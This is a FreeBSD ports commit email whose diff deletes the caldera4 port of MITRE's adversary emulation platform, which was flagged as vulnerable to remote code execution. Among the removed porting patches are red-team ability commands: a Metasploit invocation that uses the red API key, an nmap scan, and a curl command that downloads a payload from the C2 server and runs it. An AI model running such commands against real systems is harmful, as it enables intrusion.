Date: Mon, 31 Mar 2025 14:40:38 GMT
Message-Id: <202503311440.52VEecR8011376@gitrepo.freebsd.org>
To: ports-committers@FreeBSD.org, dev-commits-ports-all@FreeBSD.org, dev-commits-ports-main@FreeBSD.org
From: Rene Ladan
Subject: git: 3b634f895d45 - main - security/caldera4: Remove expired port
List-Id: Commit messages for all branches of the ports repository
List-Archive: https://lists.freebsd.org/archives/dev-commits-ports-all
X-BeenThere: dev-commits-ports-all@freebsd.org
Sender: owner-dev-commits-ports-all@FreeBSD.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
X-Git-Committer: rene
X-Git-Repository: ports
X-Git-Refname: refs/heads/main
X-Git-Reftype: branch
X-Git-Commit: 3b634f895d45c31481e21bcbe81b89acb346fb95
Auto-Submitted: auto-generated

The branch main has been updated by rene:

URL: https://cgit.FreeBSD.org/ports/commit/?id=3b634f895d45c31481e21bcbe81b89acb346fb95

commit 3b634f895d45c31481e21bcbe81b89acb346fb95
Author: Rene Ladan
AuthorDate: 2025-03-31 14:40:21 +0000
Commit: Rene Ladan
CommitDate: 2025-03-31 14:40:21 +0000

security/caldera4: Remove expired port

2025-03-31 security/caldera4: Upgrade to a newer caldera version.
4.2.0 is vulnerable to remote code execution --- MOVED | 1 + security/Makefile | 1 - security/caldera4/Makefile | 108 -- security/caldera4/distinfo | 33 - security/caldera4/files/caldera.in | 85 -- ...lities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml | 11 - ...hering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml | 11 - .../patch-plugins_access_data_payloads_scanner.sh | 11 - .../files/patch-plugins_atomic_app_atomic__svc.py | 20 - .../files/patch-plugins_emu_app_emu__svc.py | 11 - .../patch-plugins_gameboard_app_gameboard__api.py | 11 - .../files/patch-plugins_human_templates_human.html | 40 - ...ontrol_356d1722-7784-40c4-822b-0cf864b0b36d.yml | 33 - .../files/patch-plugins_manx_update-shells.sh | 12 - ...ontrol_1837b43e-4fff-46b2-a604-a602f7540469.yml | 15 - ...ection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml | 11 - ...ection_3b4640bc-eacb-407a-a997-105e39788781.yml | 18 - ...ection_930236c2-5397-4868-8c7b-72e294a5a376.yml | 18 - ...ection_9bc10f37-0853-4d73-b547-019c11eda22f.yml | 18 - ...ection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml | 11 - ...unting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml | 11 - ...unting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml | 11 - ...unting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml | 11 - ...sponse_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml | 18 - ...sponse_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml | 18 - ...sponse_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml | 18 - ...sponse_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml | 18 - ...sponse_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml | 18 - ..._setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml | 11 - ..._setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml | 18 - ..._setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml | 18 - ..._setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml | 18 - ..._setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml | 18 - ..._setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml | 18 - ..._setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml | 11 - .../files/patch-plugins_sandcat_app_sand__svc.py | 14 - 
...ontrol_2f34977d-9558-4c12-abad-349716777c6b.yml | 45 - .../files/patch-plugins_sandcat_update-agents.sh | 16 - ...gins_stockpile_app_obfuscators_base64__basic.py | 12 - ...ins_stockpile_app_obfuscators_base64__jumble.py | 12 - ...tockpile_app_obfuscators_base64__no__padding.py | 12 - ...ins_stockpile_app_obfuscators_caesar__cipher.py | 12 - ...gins_stockpile_app_obfuscators_steganography.py | 12 - ...ection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml | 11 - ...ection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml | 11 - ...ection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml | 18 - ...ection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml | 11 - ...ection_6469befa-748a-4b9c-a96d-f191fde47d89.yml | 11 - ...ection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml | 18 - ...ection_89955f55-529d-4d58-bed4-fed9e42515ec.yml | 11 - ...ection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml | 11 - ...ection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | 11 - ...ontrol_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml | 15 - ...access_422526ec-27e9-429a-995b-c686a29561a4.yml | 12 - ...access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml | 13 - ...vasion_36eecb80-ede3-442b-8774-956e906aff02.yml | 11 - ...vasion_43b3754c-def4-4699-a673-1d85648fda6a.yml | 15 - ...vasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml | 17 - ...vasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | 15 - ...covery_30732a56-4a23-4307-9544-09caf2ed29d5.yml | 11 - ...covery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml | 11 - ...covery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml | 11 - ...covery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml | 11 - ...covery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml | 17 - ...covery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml | 11 - ...covery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml | 12 - ...covery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml | 12 - ...covery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml | 11 - ...covery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml | 13 - ...covery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml | 11 - 
...covery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml | 11 - ...covery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml | 10 - ...covery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml | 18 - ...covery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml | 11 - ...covery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | 11 - ...covery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml | 13 - ...covery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml | 13 - ...covery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml | 11 - ...covery_c0da588f-79f0-4263-8998-7496b1a40596.yml | 11 - ...covery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml | 11 - ...covery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml | 11 - ...covery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml | 11 - ...covery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml | 20 - ...covery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml | 11 - ...cution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml | 11 - ...ration_0582dc26-e0cf-4645-88cf-f37a02279976.yml | 11 - ...ration_110cea7a-5b03-4443-92ee-7ccefaead451.yml | 18 - ...ration_2f90d4de-2612-4468-9251-b220e3727452.yml | 11 - ...ration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml | 18 - ...ration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml | 18 - ...ration_4a1120a5-971c-457f-bb07-60641b4723fd.yml | 11 - ...ration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml | 11 - ...ration_a201bec2-a193-4b58-bf0e-57fa621da474.yml | 18 - ...ration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml | 11 - ...ration_d754878c-17dd-46dc-891c-a993f8a10336.yml | 18 - ...ration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml | 18 - ...ration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml | 11 - ...impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml | 22 - ...impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml | 11 - ...impact_55f9600a-756f-496b-b27f-682052dc429c.yml | 11 - ...vement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml | 16 - ...vement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml | 15 - ...lation_10681f2f-be03-44af-858d-f2b0812df185.yml | 12 - .../patch-plugins_stockpile_payloads_ragdoll.py | 11 - 
...aining_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml | 11 - ...aining_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml | 17 - ...aining_e13c4e45-d19f-440e-8a72-fad728a1789c.yml | 13 - ...aining_f0d77555-fa79-4884-8afd-73d39f887879.yml | 15 - ...aining_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml | 18 - .../caldera4/files/patch-templates_abilities.html | 11 - .../files/patch-templates_adversaries.html | 20 - .../caldera4/files/patch-templates_agents.html | 32 - security/caldera4/files/pkg-message.in | 75 -- security/caldera4/pkg-descr | 14 - security/caldera4/pkg-plist | 1299 -------------------- 115 files changed, 1 insertion(+), 3171 deletions(-) diff --git a/MOVED b/MOVED index ab8f5f0919ae..f4d10e1b0466 100644 --- a/MOVED +++ b/MOVED @@ -4246,3 +4246,4 @@ databases/pgfouine||2025-03-31|Has expired: Upstream project disappeared in 2010 multimedia/spook||2025-03-31|Has expired: Abandonware and obsolete, consider using multimedia/ffmpeg or multimedia/vlc finance/odoo14||2025-03-31|Has expired: Depends on expired converters/wkhtmltopdf and print/py-pypdf2 net/nsscache||2025-03-31|Has expired: Depends on expired devel/py-pytest-runner +security/caldera4||2025-03-31|Has expired: Upgrade to a newer caldera version. 4.2.0 is vulnerable to remote code execution diff --git a/security/Makefile b/security/Makefile index db3fb7bc6e15..4109d398ce11 100644 --- a/security/Makefile +++ b/security/Makefile @@ -68,7 +68,6 @@ SUBDIR += caesarcipher SUBDIR += caldera SUBDIR += caldera-ot - SUBDIR += caldera4 SUBDIR += calife SUBDIR += cardpeek SUBDIR += cargo-audit diff --git a/security/caldera4/Makefile b/security/caldera4/Makefile deleted file mode 100644 index ddbbfa12a4e3..000000000000 --- a/security/caldera4/Makefile +++ /dev/null 
@@ -1,108 +0,0 @@ -PORTNAME= caldera -DISTVERSION= 4.2.0 -PORTREVISION= 13 -PKGNAMESUFFIX= 4 -CATEGORIES= security python - -MAINTAINER= acm@FreeBSD.org -COMMENT= Automated Adversary Emulation Platform -WWW= https://github.com/mitre/caldera - -CONFLICTS= caldera - -LICENSE= APACHE20 -LICENSE_FILE= ${WRKSRC}/LICENSE - -DEPRECATED= Upgrade to a newer caldera version. 4.2.0 is vulnerable to remote code execution -EXPIRATION_DATE=2025-03-31 - -RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}pyyaml>=0:devel/py-pyyaml@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \ - 
${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \ - upx>0:archivers/upx \ - base64>0:converters/base64 \ - git>0:devel/git \ - bash>0:shells/bash - -USE_GITHUB= yes -GH_ACCOUNT= mitre -GH_PROJECT= ${PORTNAME} -GH_TUPLE= mitre:access:0e67776:access/plugins/access \ - mitre:atomic:9e2c958:atomic/plugins/atomic \ - mitre:builder:f2ce67c:builder/plugins/builder \ - mitre:compass:fb88e02:compass/plugins/compass \ - mitre:debrief:e4d4f9e:debrief/plugins/debrief \ - mitre:emu:02a0f3e:emu/plugins/emu \ - mitre:fieldmanual:c286e77:fieldmanual/plugins/fieldmanual \ - mitre:gameboard:3d98c32:gameboard/plugins/gameboard \ - mitre:human:4368dea:human/plugins/human \ - mitre:manx:e7205ea:manx/plugins/manx \ - mitre:response:889213a:response/plugins/response \ - mitre:sandcat:7c326bd:sandcat/plugins/sandcat \ - mitre:ssl:ac5bfcb:ssl/plugins/ssl \ - mitre:stockpile:960f9ad:stockpile/plugins/stockpile \ - mitre:training:b058b67:training/plugins/training - -USES= dos2unix go:run python -USE_PYTHON= cryptography - -NO_ARCH= yes -NO_BUILD= yes - -DOS2UNIX_REGEX= .*\.([yml]) -CALDERA_USER= caldera -CALDERA_GROUP= caldera -USERS= ${CALDERA_USER} -GROUPS= ${CALDERA_GROUP} - -USE_RC_SUBR= ${PORTNAME:S/-/_/} -SUB_FILES= pkg-message -SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \ - 
WWWDIR=${WWWDIR} - -OPTIONS_DEFINE= HAPROXY -OPTIONS_DEFAULT=HAPROXY -HAPROXY_DESC= Support for HTTPS -HAPROXY_RUN_DEPENDS=haproxy24>0:net/haproxy24 - -post-extract: - ${RM} -R ${WRKSRC}/.github - cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \ - .git* .pre* .stylelintrc.json Dockerfile - -post-patch: - cd ${WRKSRC} && \ - ${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \; - -do-install: - @cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR} - -.include diff --git a/security/caldera4/distinfo b/security/caldera4/distinfo deleted file mode 100644 index 7542fc288b4e..000000000000 --- a/security/caldera4/distinfo +++ /dev/null 
@@ -1,33 +0,0 @@ -TIMESTAMP = 1687320760 -SHA256 (mitre-caldera-4.2.0_GH0.tar.gz) = 2c93501ca05fe89cd18a038376c278e50d371881dfe84824a0f98dc3d9023fd9 -SIZE (mitre-caldera-4.2.0_GH0.tar.gz) = 3777586 -SHA256 (mitre-access-0e67776_GH0.tar.gz) = dc80b9c5cb92f75fa6d18f618f64a4d3c5ddd1b08b020d86feb70fbaa0f4c43d -SIZE (mitre-access-0e67776_GH0.tar.gz) = 8494 -SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085 -SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142 -SHA256 (mitre-builder-f2ce67c_GH0.tar.gz) = da9d987a2a656bb9eb5d1c0d36115c8fb8fe740503fa1a43a1bfcce1018f461b -SIZE (mitre-builder-f2ce67c_GH0.tar.gz) = 7944 -SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16 -SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907 -SHA256 (mitre-debrief-e4d4f9e_GH0.tar.gz) = 721b262744118b91b812ec0e098fa0c75f845a7814d8fa58fa52a2ace04432ee -SIZE (mitre-debrief-e4d4f9e_GH0.tar.gz) = 998929 -SHA256 (mitre-emu-02a0f3e_GH0.tar.gz) = 9dd6b46fe93ba12467612e4bf4a45df5513dad1709a72addc3898c430b8ec1ad -SIZE (mitre-emu-02a0f3e_GH0.tar.gz) = 17467 -SHA256 (mitre-fieldmanual-c286e77_GH0.tar.gz) = 6f086d0d4f519d0dcf49fbded87ee8095622c3028461d745d2e7eea422d68d57 -SIZE (mitre-fieldmanual-c286e77_GH0.tar.gz) = 7828491 -SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a -SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753 -SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a -SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846 -SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470 -SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820 -SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee -SIZE (mitre-response-889213a_GH0.tar.gz) = 24463 -SHA256 (mitre-sandcat-7c326bd_GH0.tar.gz) = 
60049cf759e8b31b29e84832a112c87be8101e303d088e0f2b9da4647f79855f -SIZE (mitre-sandcat-7c326bd_GH0.tar.gz) = 7816391 -SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12 -SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395 -SHA256 (mitre-stockpile-960f9ad_GH0.tar.gz) = 516d28ae26d66049e2273f60bbae0254b071152b613f259a7ff596ad2d92461f -SIZE (mitre-stockpile-960f9ad_GH0.tar.gz) = 4781396 -SHA256 (mitre-training-b058b67_GH0.tar.gz) = 44c5ee5f682918f1f8ace4ff4ea3b8e16d24795ff8b8fb5896d68c585d33b8c0 -SIZE (mitre-training-b058b67_GH0.tar.gz) = 491615 diff --git a/security/caldera4/files/caldera.in b/security/caldera4/files/caldera.in deleted file mode 100644 index d08e4fae7d5c..000000000000 --- a/security/caldera4/files/caldera.in +++ /dev/null 
@@ -1,85 +0,0 @@ -#!/bin/sh - -# PROVIDE: caldera -# REQUIRE: NETWORKING -# KEYWORD: shutdown -# -# Configuration settings for caldera in /etc/rc.conf: -# -# caldera_enable: run caldera as service (default=NO) -# caldera_flags: additional flags for caldera server -# - -. /etc/rc.subr - -name=caldera -rcvar=caldera_enable - -load_rc_config ${name} - -export PATH="${PATH}:/usr/local/bin:/usr/local/sbin" - -: ${caldera_enable:=NO} -: ${caldera_flags="--insecure"} - -caldera_env="GOCACHE=/tmp/caldera/.cache GOMODCACHE=/tmp/caldera/.vendor" -caldera_user="caldera" -caldera_wwwdir="%%WWWDIR%%" -caldera_logfile="/var/log/caldera.log" - -pidfile="/var/run/${name}.pid" -python_command="%%PYTHON_CMD%%" -python_script="${caldera_wwwdir}/server.py" -start_cmd=${name}_start -status_cmd=${name}_status -stop_cmd=${name}_stop -restart_cmd=${name}_restart -extra_commands="status" - -caldera_start() -{ - if [ ! -f ${pidfile} ] - then - cd ${caldera_wwwdir} && \ - daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o ${caldera_logfile} \ - ${python_command} ${python_script} \ - ${caldera_flags} - - echo "Starting ${name}" - else - echo "${name} is running as pid" `cat ${pidfile}` - fi -} - -caldera_status() -{ - # If running, show pid - if [ -f ${pidfile} ] - then - echo "${name} is running as pid" `cat ${pidfile}` - else - echo "${name} is not running" - fi -} - -caldera_stop() -{ - if [ -f ${pidfile} ] - then - kill `cat ${pidfile}` - rm ${pidfile} - echo "Stopping ${name}" - else - echo "${name} not running? (check ${pidfile})." - fi -} - -caldera_restart() -{ - echo "Performing restart ${name}" - caldera_stop - sleep 3 - caldera_start -} - -run_rc_command "$1" diff --git a/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml deleted file mode 100644 index c0bc8a3c91ed..000000000000 
--- a/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml -@@ -7,7 +7,7 @@ - name: Build or acquire exploits - attack_id: T1349 - platforms: -- darwin,linux: -+ darwin,freebsd,linux: - sh: - command: | - msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red} diff --git a/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml deleted file mode 100644 index f7304f2ee2ad..000000000000 --- a/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml -@@ -7,7 +7,7 @@ - name: Conduct active scanning - attack_id: T1254 - platforms: -- darwin,linux: -+ darwin,freebsd,linux: - sh: - command: | - ./scanner.sh #{target.ip} diff --git a/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh deleted file mode 100644 index acdadfff6d43..000000000000 --- a/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh +++ /dev/null 
@@ -1,11 +0,0 @@ ---- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/payloads/scanner.sh -@@ -1,5 +1,5 @@ --#!/bin/bash -+#!/bin/sh - - echo '[+] Starting basic NMAP scan' - nmap -Pn $1 --echo '[+] Complete with module' -\ No newline at end of file -+echo '[+] Complete with module' diff --git a/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py deleted file mode 100644 index 04e18806665b..000000000000 --- a/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py +++ /dev/null @@ -1,20 +0,0 @@ ---- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC -+++ plugins/atomic/app/atomic_svc.py -@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld - from app.utility.base_service import BaseService - from app.objects.c_agent import Agent - --PLATFORMS = dict(windows='windows', macos='darwin', linux='linux') -+PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd') - EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh') - RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL) - PREFIX_HASH_LEN = 6 -@@ -45,7 +45,7 @@ class AtomicService(BaseService): - the `repo_url` parameter (eg. if you want to use a fork). - """ - if not repo_url: -- repo_url = 'https://github.com/redcanaryco/atomic-red-team.git' -+ repo_url = 'https://github.com/alonsobsd/atomic-red-team.git' - - if not os.path.exists(self.repo_dir) or not os.listdir(self.repo_dir): - self.log.debug('cloning repo %s' % repo_url) diff --git a/security/caldera4/files/patch-plugins_emu_app_emu__svc.py b/security/caldera4/files/patch-plugins_emu_app_emu__svc.py deleted file mode 100644 index 735212716c22..000000000000 --- a/security/caldera4/files/patch-plugins_emu_app_emu__svc.py +++ /dev/null 
@@ -1,11 +0,0 @@ ---- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC -+++ plugins/emu/app/emu_svc.py -@@ -12,7 +12,7 @@ - - - class EmuService(BaseService): -- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'} -+ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'} - _emu_config_path = "conf/default.yml" - - def __init__(self): diff --git a/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py deleted file mode 100644 index 7121866698a1..000000000000 --- a/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC -+++ plugins/gameboard/app/gameboard_api.py -@@ -244,7 +244,7 @@ class GameboardApi(BaseService): - reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace - ability_id = str(uuid.uuid4()) - executors = [] -- for pl in ['windows', 'darwin', 'linux']: -+ for pl in ['windows', 'darwin', 'linux', 'freebsd']: - reference_executor = reference_ability.find_executor('elasticsearch', pl) - if not reference_executor: - continue diff --git a/security/caldera4/files/patch-plugins_human_templates_human.html b/security/caldera4/files/patch-plugins_human_templates_human.html deleted file mode 100644 index 9bc604e58123..000000000000 --- a/security/caldera4/files/patch-plugins_human_templates_human.html +++ /dev/null 
@@ -1,40 +0,0 @@ ---- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC -+++ plugins/human/templates/human.html -@@ -60,6 +60,7 @@ - -@@ -257,6 +258,11 @@ - ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + - '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; - break; -+ case "freebsd": -+ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + -+ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + -+ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; -+ break; - case "linux": - baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + - ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + -@@ -293,6 +299,10 @@ - $.each(extra, function(i, command) { - switch (platform) { - case "darwin": -+ command = command.replace(/\\/g, '\\\\'); -+ command = command.replace(/"/g, '\\\"'); -+ break; -+ case "freebsd": - command = command.replace(/\\/g, '\\\\'); - command = command.replace(/"/g, '\\\"'); - break; -@@ -317,4 +327,4 @@ - return provided_value || default_value; - } - -- -\ No newline at 